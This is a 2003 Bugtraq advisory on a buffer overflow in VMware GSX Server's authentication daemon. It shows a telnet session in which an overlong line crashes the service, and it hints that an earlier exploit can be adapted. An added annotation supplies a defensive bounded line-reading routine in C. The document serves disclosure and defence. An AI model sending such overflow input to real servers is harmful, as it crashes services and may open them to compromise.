Date: 31 Oct 2003 16:28:55 -0000
From: Darryl Swofford <dswofford@...g.com>
To: bugtraq@...urityfocus.com
Subject: VMWare GSX Server Authentication Server Buffer Overflow Vulnerability - Update

Author: Darryl Swofford
Email: dswofford@...g.com

Date: 2003/10/31

System:
VMware GSX Server 2.0.1 build-2129 for Windows (other versions not tested). Tested on Windows NT/2000/2003/XP systems.

Description:
After reviewing Bugtraq #5294 (VMWare GSX Server Authentication Server Buffer Overflow Vulnerability) I was able to modify the sample code to exploit the updated vmware-authd service.

I will not release the source code as I feel this is not prudent until the vendor acknowledges the issue. Until then you can view the overflow by using telnet with the following syntax and simply alter the code as I did. 

>telnet VMserver.somecompany.com 902
> 220 VMware Authentication Daemon Version 1.00
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA599 vmware-authd
 PANIC: Buffer overflow in VMAuthdSocketRead()
 >
Connection to host lost.


Analysis:
It seems that the vmware-authd service limits the input strings of the program when passed correct arguments (USER, PASS, GLOBAL); however, the initial readline can be overflowed, as it does not control the amount of data passed to it.
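Added example (not the advisory's code and not VMware's): a bounded line reader of the kind the initial readline above needs, so that an overlong first line is rejected and the connection dropped instead of the buffer being overrun. It assumes one CRLF- or LF-terminated command per line and a constructed 256-byte limit (LINE_MAX_LEN); the names read_line_bounded, parse_into_scratch, accepted_before_reject and rejects_a_line_of are hypothetical, as is the transcript fed to main().

```c
/* Added example, not vmware-authd's code. A bounded line reader for a
 * text-protocol daemon. Assumptions: one command per line, CRLF or LF
 * terminated, and lines longer than the buffer are rejected rather than
 * truncated or written past the end of the buffer. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define LINE_MAX_LEN 256           /* constructed limit for this example */

enum line_status { LINE_OK, LINE_TOO_LONG, LINE_INCOMPLETE };

/* Copy one line (without its terminator) from src into dst, which holds
 * dst_len bytes including the NUL. Never writes past dst. *consumed is the
 * number of source bytes used, so a caller can advance its read buffer. */
enum line_status read_line_bounded(const char *src, size_t src_len,
                                   char *dst, size_t dst_len,
                                   size_t *consumed)
{
    size_t i;
    *consumed = 0;
    if (dst_len == 0)
        return LINE_TOO_LONG;
    for (i = 0; i < src_len; i++) {
        if (src[i] == '\n') {
            size_t n = i;
            if (n > 0 && src[n - 1] == '\r')
                n--;                           /* drop the CR of a CRLF */
            memcpy(dst, src, n);               /* n <= dst_len - 1 here */
            dst[n] = '\0';
            *consumed = i + 1;
            return LINE_OK;
        }
        if (i + 1 >= dst_len) {
            /* buffer would fill before a newline: reject, do not overflow */
            *consumed = i + 1;
            return LINE_TOO_LONG;
        }
    }
    return LINE_INCOMPLETE;                    /* wait for more bytes */
}

static char g_line[LINE_MAX_LEN];  /* scratch buffer for the helpers below */

/* Parse one NUL-terminated line into g_line and return its status. */
enum line_status parse_into_scratch(const char *src)
{
    size_t used;
    return read_line_bounded(src, strlen(src), g_line, sizeof g_line, &used);
}

/* Build a constructed line of `len` 'A's plus newline and report whether
 * the bounded reader rejects it: 1 = rejected, 0 = accepted, -1 = too big
 * for the local scratch space. */
int rejects_a_line_of(size_t len)
{
    char buf[1024];
    size_t used;
    if (len + 1 >= sizeof buf)
        return -1;
    memset(buf, 'A', len);
    buf[len] = '\n';
    return read_line_bounded(buf, len + 1, g_line, sizeof g_line, &used)
           == LINE_TOO_LONG;
}

/* Walk a constructed client transcript the way a daemon's read loop would,
 * returning how many lines were accepted before an oversize line forced a
 * disconnect (or the total, if none did). */
int accepted_before_reject(const char *transcript)
{
    size_t off = 0, len = strlen(transcript), used;
    int accepted = 0;
    while (off < len) {
        enum line_status st = read_line_bounded(transcript + off, len - off,
                                                g_line, sizeof g_line, &used);
        if (st == LINE_TOO_LONG) {
            printf("line too long, closing connection\n");
            return accepted;
        }
        if (st == LINE_INCOMPLETE)
            break;                 /* a real daemon would block for more data */
        printf("accepted: %s\n", g_line);
        accepted++;
        off += used;
    }
    return accepted;
}

int main(void)
{
    /* Constructed transcript: two short commands, then a 300-byte line like
     * the one in the telnet session above. Expect 2 accepted, then a close. */
    char transcript[600];
    strcpy(transcript, "USER guest\r\nPASS x\r\n");
    memset(transcript + 20, 'A', 300);
    transcript[320] = '\n';
    transcript[321] = '\0';
    printf("accepted %d lines\n", accepted_before_reject(transcript));
    return 0;
}
```

The choice to reject rather than silently truncate matters for a protocol like this one: a truncated USER or PASS line would be parsed as a different command than the client sent, whereas dropping the connection leaves nothing ambiguous to act on.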
 
Remedy:
Stop and disable the VMware authorization service. 
